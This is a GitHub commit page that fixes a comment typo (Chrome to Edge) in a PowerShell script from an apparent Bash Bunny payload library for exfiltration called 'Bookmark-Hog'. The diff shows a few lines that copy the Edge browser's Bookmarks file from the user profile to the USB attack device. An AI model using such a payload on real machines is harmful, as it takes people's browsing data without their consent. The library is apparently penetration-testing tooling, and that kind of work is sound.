Skip to content

Commit

Permalink
Update BBB.ps1
Browse files Browse the repository at this point in the history
Typo in comments, Chrome should be Edge.
  • Loading branch information
Jeklah authored Sep 6, 2022
1 parent 5738de5 commit 3e608cd
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@ if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Dat
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
# Copy Edge Bookmarks to Bash Bunny
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
}
}

0 comments on commit 3e608cd

Please sign in to comment.